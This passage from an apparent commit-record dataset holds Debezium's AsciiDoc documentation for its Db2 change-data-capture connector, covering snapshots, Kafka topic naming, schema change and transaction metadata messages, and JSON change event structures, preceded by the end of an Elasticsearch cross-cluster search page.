in that\ncluster receives and parses the request.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-request.svg[]\n\n. The coordinating node sends a <<search-shards,search shards>> API request to\neach remote cluster.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-search.svg[]\n\n. Each remote cluster sends its response back to the coordinating node.\nThis response contains information about the indices and shards the {ccs}\nrequest will be executed on.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-results.svg[]\n\n. The coordinating node sends a search request to each shard, including those in\nits own cluster. Each shard performs the search request independently.\n+\n[WARNING]\n====\nWhen network roundtrips aren't minimized, the search is executed as if all data\nwere in the coordinating node's cluster. We recommend updating cluster-level\nsettings that limit searches, such as `action.search.shard_count.limit`,\n`pre_filter_shard_size`, and `max_concurrent_shard_requests`, to account for\nthis. If these limits are too low, the search may be rejected.\n====\n+\nimage:images\/ccs\/ccs-dont-min-roundtrip-shard-search.svg[]\n\n. Each shard sends its search results back to the coordinating node.\n+\nimage:images\/ccs\/ccs-dont-min-roundtrip-shard-results.svg[]\n\n. After collecting results from each cluster, the coordinating node returns the\nfinal results in the {ccs} response.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-response.svg[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f8f0d7d8a0ae4b4bde60ab6af83f2d41a74d120","subject":"DBZ-2122 Add Db2 topic for capture job configuration","message":"DBZ-2122 Add Db2 topic for capture job configuration\n","repos":"debezium\/debezium,jpechane\/debezium,debezium\/debezium,jpechane\/debezium,jpechane\/debezium,jpechane\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/db2.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/db2.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-db2\"]\n= {prodname} connector for Db2\n\n:context: db2\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\nendif::community[]\n\n{prodname}'s Db2 connector can capture row-level changes in the tables of a Db2 database. This connector is strongly inspired by the {prodname} implementation of SQL Server, which uses a SQL-based polling model that puts tables into \"capture mode\". When a table is in capture mode, the {prodname} Db2 connector generates and streams a change event for each row-level update to that table.\n\nA table that is in capture mode has an associated change-data table, which Db2 creates. For each change to a table that is in capture mode, Db2 adds data about that change to the table's associated change-data table. A change-data table contains an entry for each state of a row. It also has special entries for deletions. The {prodname} Db2 connector reads change events from change-data tables and emits the events to Kafka topics.\n\nThe first time a {prodname} Db2 connector connects to a Db2 database, the connector reads a consistent snapshot of the tables for which the connector is configured to capture changes. By default, this is all non-system tables. There are connector configuration properties that let you specify which tables to put into capture mode, or which tables to exclude from capture mode.\n\nWhen the snapshot is complete the connector begins emitting change events for committed updates to tables that are in capture mode. By default, change events for a particular table go to a Kafka topic that has the same name as the table. Applications and services consume change events from these topics.\n\n[NOTE]\n====\nThe connector uses the abstract syntax notation (ASN) libraries that come as a standard part of Db2 LUW (Db2 for Linux, UNIX and Windows) and which you can add to Db2 zOS.\nTo use ASN and hence this connector, you must have a license for the IBM InfoSphere Data Replication (IIDR) product.\nHowever, IIDR does not need to be installed.\n====\n\nifdef::community[]\nThe Db2 connector has been tested with Db2\/Linux {db2-version}.\nIt is expected that the connector would also work on other platforms such as Windows,\nand we'd love to get your feedback if you can confirm this to be the case.\nendif::community[]\n\nifdef::product[]\nThe Db2 connector has been tested with Db2\/Linux {db2-version}.\nendif::product[]\n\nifdef::product[]\nInformation and procedures for using a {prodname} Db2 connector is organized as follows:\n\n* xref:overview-of-debezium-db2-connector[]\n* xref:how-debezium-db2-connectors-work[]\n* xref:descriptions-of-debezium-db2-connector-data-change-events[]\n* xref:how-debezium-db2-connectors-map-data-types[]\n* xref:setting-up-db2-to-run-a-debezium-connector[]\n* xref:deploying-debezium-db2-connectors[]\n* xref:monitoring-debezium-db2-connector-performance[]\n* xref:managing-debezium-db2-connectors[]\n* xref:updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} Db2 connector\n\/\/ ModuleID: overview-of-debezium-db2-connector\n[[db2-overview]]\n== Overview\n\nThe {prodname} Db2 connector is based on the link:https:\/\/www.ibm.com\/support\/pages\/q-replication-and-sql-replication-product-documentation-pdf-format-version-101-linux-unix-and-windows[ASN Capture\/Apply agents]\nthat enable SQL Replication in Db2. A capture agent:\n\n* Generates change-data tables for tables that are in capture mode.\n* Monitors tables in capture mode and stores change events for updates to those tables in their corresponding change-data tables.\n\nThe {prodname} connector uses a SQL interface to query change-data tables for change events.\n\nThe database administrator must put the tables for which you want to capture changes into capture mode. For convenience and for automating testing, there are {link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[{prodname} user-defined functions (UDFs)] in C that you can compile and then use to do the following management tasks:\n\n* Start, stop, and reinitialize the ASN agent\n* Put tables into capture mode\n* Create the replication (ASN) schemas and change-data tables\n* Remove tables from capture mode\n\nAlternatively, you can use Db2 control commands to accomplish these tasks.\n\nAfter the tables of interest are in capture mode, the connector reads their corresponding change-data tables to obtain change events for table updates. The connector emits a change event for each row-level insert, update, and delete operation to a Kafka topic that has the same name as the changed table. This is default behavior that you can modify. Client applications read the Kafka topics that correspond to the database tables of interest and can react to each row-level change event.\n\nTypically, the database administrator puts a table into capture mode in the middle of the life of a table. This means that the connector does not have the complete history of all changes that have been made to the table. Therefore, when the Db2 connector first connects to a particular Db2 database, it starts by performing a _consistent snapshot_ of each table that is in capture mode. After the connector completes the snapshot, the connector streams change events from the point at which the snapshot was made. In this way, the connector starts with a consistent view of the tables that are in capture mode, and does not drop any changes that were made while it was performing the snapshot.\n\n{prodname} connectors are tolerant of failures. As the connector reads and produces change events, it records the log sequence number (LSN) of the change-data table entry. The LSN is the position of the change event in the database log. If the connector stops for any reason, including communication failures, network problems, or crashes, upon restarting it continues reading the change-data tables where it left off. This includes snapshots. That is, if the snapshot was not complete when the connector stopped, upon restart the connector begins a new snapshot.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-db2-connectors-work\n\/\/ Title: How {prodname} Db2 connectors work\n[[how-the-db2-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} Db2 connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and handles schema changes.\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-db2-connectors-perform-database-snapshots[]\n* xref:how-debezium-db2-connectors-read-change-data-tables[]\n* xref:default-names-of-kafka-topics-that-receive-db2-change-event-records[]\n* xref:about-the-debezium-db2-connector-schema-change-topic[]\n* xref:debezium-db2-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-db2-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} Db2 connectors perform database snapshots\n[[db2-snapshots]]\n=== Snapshots\n\nDb2`s replication feature is not designed to store the complete history of database changes. Consequently, when a {prodname} Db2 connector connects to a database for the first time, it takes a consistent snapshot of tables that are in capture mode and streams this state to Kafka. This establishes the baseline for table content.\n\nBy default, when a Db2 connector performs a snapshot, it does the following:\n\n. Determines which tables are in capture mode, and thus must be included in the snapshot. By default, all non-system tables are in capture mode. Connector configuration properties, such as `table.exclude.list` and `table.include.list` let you specify which tables should be in capture mode.\n. Obtains a lock on each of the tables in capture mode. This ensures that no schema changes can occur in those tables during the snapshot.\nThe level of the lock is determined by the `snapshot.isolation.mode` connector configuration property.\n. Reads the highest (most recent) LSN position in the server's transaction log.\n. Captures the schema of all tables that are in capture mode. The connector persists this information in its internal database history topic.\n. Optional, releases the locks obtained in step 2. Typically, these locks are held for only a short time.\n. At the LSN position read in step 3, the connector scans the capture mode tables as well as their schemas. During the scan, the connector:\n.. Confirms that the table was created before the start of the snapshot. If it was not, the snapshot skips that table. After the snapshot is complete, and the connector starts emitting change events, the connector produces change events for any tables that were created during the snapshot.\n.. Produces a _read_ event for each row in each table that is in capture mode. All _read_ events contain the same LSN position, which is the LSN position that was obtained in step 3.\n.. Emits each _read_ event to the Kafka topic that has the same name as the table.\n. Records the successful completion of the snapshot in the connector offsets.\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} Db2 connectors read change-data tables\n[id=\"how-debezium-db2-connectors-read-change-data-tables\"]\n=== Change-data tables\n\nAfter a complete snapshot, when a {prodname} Db2 connector starts for the first time, the connector identifies the change-data table for each source table that is in capture mode. The connector does the following for each change-data table:\n\n. Reads change events that were created between the last stored, highest LSN and the current, highest LSN.\n. Orders the change events according to the commit LSN and the change LSN for each event. This ensures that the connector emits the change events in the order in which the table changes occurred.\n. Passes commit and change LSNs as offsets to Kafka Connect.\n. Stores the highest LSN that the connector passed to Kafka Connect.\n\nAfter a restart, the connector resumes emitting change events from the offset (commit and change LSNs) where it left off. While the connector is running and emitting change events, if you remove a table from capture mode or add a table to capture mode, the connector detects this and modifies its behavior accordingly.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-db2-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} Db2 change event records\n[[db2-topic-names]]\n=== Topic names\n\nBy default, the Db2 connector writes change events for all insert, update, and delete operations on a single table to a single Kafka topic. The name of the Kafka topic has the following format:\n\n_databaseName_._schemaName_._tableName_\n\n_databaseName_:: The logical name of the connector as specified with the `database.server.name` connector configuration property.\n\n_schemaName_:: The name of the schema in which the operation occurred.\n\n_tableName_:: The name of the table in which the operation occurred.\n\nFor example, consider a Db2 installation with the `mydatabase` database, which contains four tables: `PRODUCTS`, `PRODUCTS_ON_HAND`, `CUSTOMERS`, and `ORDERS` that are in the `MYSCHEMA` schema. The connector would emit events to these four Kafka topics:\n\n* `mydatabase.MYSCHEMA.PRODUCTS`\n* `mydatabase.MYSCHEMA.PRODUCTS_ON_HAND`\n* `mydatabase.MYSCHEMA.CUSTOMERS`\n* `mydatabase.MYSCHEMA.ORDERS`\n\nTo configure a Db2 connector to emit change events to differently-named Kafka topics, see the documentation for the {link-prefix}:{link-topic-routing}#topic-routing[topic routing transformation].\n\n\/\/ Type: concept\n\/\/ Title: About the {prodname} Db2 connector schema change topic\n[id=\"about-the-debezium-db2-connector-schema-change-topic\"]\n=== Schema change topic\n\nFor a table that is in capture mode, the {prodname} Db2 connector stores the history of schema changes to that table in a database history topic. This topic reflects an internal connector state and you should not use it. If your application needs to track schema changes, there is a public schema change topic. The name of the schema change topic is the same as the logical server name specified in the connector configuration.\n\n[WARNING]\n====\nThe format of messages that a connector emits to its schema change topic is in an incubating state and can change without notice.\n====\n\n{prodname} emits a message to the schema change topic when:\n\n* A new table goes into capture mode.\n* A table is removed from capture mode.\n* During a {link-prefix}:{link-db2-connector}#db2-schema-evolution[database schema update], there is a change in the schema for a table that is in capture mode.\n\nA message to the schema change topic contains a logical representation of the table schema, for example:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n ...\n },\n \"payload\": {\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"db2\",\n \"ts_ms\": 1588252618953,\n \"snapshot\": \"true\",\n \"db\": \"testdb\",\n \"schema\": \"DB2INST1\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": null,\n \"commit_lsn\": \"00000025:00000d98:00a2\",\n \"event_serial_no\": null\n },\n \"databaseName\": \"TESTDB\", \/\/ <1>\n \"schemaName\": \"DB2INST1\",\n \"ddl\": null, \/\/ <2>\n \"tableChanges\": [ \/\/ <3>\n {\n \"type\": \"CREATE\", \/\/ <4>\n \"id\": \"\\\"DB2INST1\\\".\\\"CUSTOMERS\\\"\", \/\/ <5>\n \"table\": { \/\/ <6>\n \"defaultCharsetName\": null,\n \"primaryKeyColumnNames\": [ \/\/ <7>\n \"ID\"\n ],\n \"columns\": [ \/\/ <8>\n {\n \"name\": \"ID\",\n \"jdbcType\": 4,\n \"nativeType\": null,\n \"typeName\": \"int identity\",\n \"typeExpression\": \"int identity\",\n \"charsetName\": null,\n \"length\": 10,\n \"scale\": 0,\n \"position\": 1,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"FIRST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 2,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"LAST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 3,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"EMAIL\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 4,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n }\n ]\n }\n }\n ]\n }\n}\n----\n\n.Descriptions of fields in messages emitted to the schema change topic\n[cols=\"1,3,6\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`databaseName` +\n`schemaName`\n|Identifies the database and the schema that contain the change.\n\n|2\n|`ddl`\n|Always `null` for the Db2 connector. For other connectors, this field contains the DDL responsible for the schema change. This DDL is not available to Db2 connectors.\n\n|3\n|`tableChanges`\n|An array of one or more items that contain the schema changes generated by a DDL command.\n\n|4\n|`type`\na|Describes the kind of change. The value is one of the following:\n\n* `CREATE` - table created\n* `ALTER` - table modified\n* `DROP` - table deleted\n\n|5\n|`id`\n|Full identifier of the table that was created, altered, or dropped.\n\n|6\n|`table`\n|Represents table metadata after the applied change.\n\n|7\n|`primaryKeyColumnNames`\n|List of columns that compose the table's primary key.\n\n|8\n|`columns`\n|Metadata for each column in the changed table.\n\n|===\n\nIn messages to the schema change topic, the key is the name of the database that contains the schema change. In the following example, the `payload` field contains the key:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"databaseName\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.SchemaChangeKey\"\n },\n \"payload\": {\n \"databaseName\": \"TESTDB\"\n }\n}\n----\n\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} Db2 connector-generated events that represent transaction boundaries\n[[db2-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich change data event messages. For every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n* `status` - `BEGIN` or `END`\n* `id` - string representation of unique transaction identifier\n* `event_count` (for `END` events) - total number of events emitted by the transaction\n* `data_collections` (for `END` events) - an array of pairs of `data_collection` and `event_count` that provides the number of events emitted by changes originating from the given data collection\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"testDB.dbo.tablea\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"testDB.dbo.tableb\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nThe connector emits transaction events to the `_database.server.name_.transaction` topic.\n\n.Data change event enrichment\n\nWhen transaction metadata is enabled the connector enriches the change event `Envelope` with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"00000025:00000d08:0025\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} Db2 connector data change events\n[[db2-events]]\n== Data change events\n\nThe {prodname} Db2 connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-db2-connector}#db2-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-db2-connector}#db2-topic-names[topic names].\n\n[WARNING]\n====\nThe {prodname} Db2 connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n\nAlso, Db2 names for databases, schemas, and tables can be case sensitive. This means that the connector could emit event records for more than one table to the same Kafka topic.\n====\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:about-keys-in-debezium-db2-change-events[]\n* xref:about-values-in-debezium-db2-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-db2-change-events\n\/\/ Title: About keys in {prodname} db2 change events\n[[db2-change-event-keys]]\n=== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [ \/\/ <2>\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n }\n ],\n \"optional\": false, \/\/ <3>\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Key\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"ID\": 1004\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`mydatabase.MYSCHEMA.CUSTOMERS.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: +\n\n* `mydatabase` is the name of the connector that generated this event. +\n* `MYSCHEMA` is the database schema that contains the table that was changed. +\n* `CUSTOMERS` is the table that was updated.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `ID` field whose value is `1004`.\n\n|===\n\n\/\/\/\/\n[NOTE]\n====\nAlthough the `column.exclude.list` connector configuration property allows you to omit columns from event values, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. The rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\/\/\/\/\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-db2-change-events\n\/\/ Title: About values in {prodname} Db2 change events\n[[db2-change-event-values]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\nThe event value portion of every change event for the `customers` table specifies the same schema. The event value's payload varies according to the event type:\n\n* <<db2-create-events,_create_ events>>\n* <<db2-update-events,_update_ events>>\n* <<db2-delete-events,_delete_ events>>\n\n[[db2-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"change_lsn\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"commit_lsn\"\n },\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729468470,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000758:0003\",\n \"commit_lsn\": \"00000027:00000758:0005\",\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559729471739 \/\/ <10>\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`mydatabase.MYSCHEMA.CUSTOMERS.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. The connector uses this schema for all rows in the `MYSCHEMA.CUSTOMERS` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._schemaName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.db2.Source` is the schema for the payload's `source` field. This schema is specific to the Db2 connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`mydatabase.MYSCHEMA.CUSTOMERS.Envelope` is the schema for the overall structure of the payload, where `mydatabase` is the database, `MYSCHEMA` is the schema, and `CUSTOMERS` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that JSON representations of events are much larger than the rows they describe. This is because a JSON representation must include the schema portion and the payload portion of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\n|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `ID`, `FIRST_NAME`, `LAST_NAME`, and `EMAIL` columns.\n\n|8\n|`source`\na| Mandatory field that describes the source metadata for the event. The `source` structure shows Db2 information about this change, which provides traceability. It also has information you can use to compare to other events in the same topic or in other topics to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\n[[db2-update-events]]\n=== _update_ events\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the _update_ event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"ID\": 1005,\n \"FIRST_NAME\": 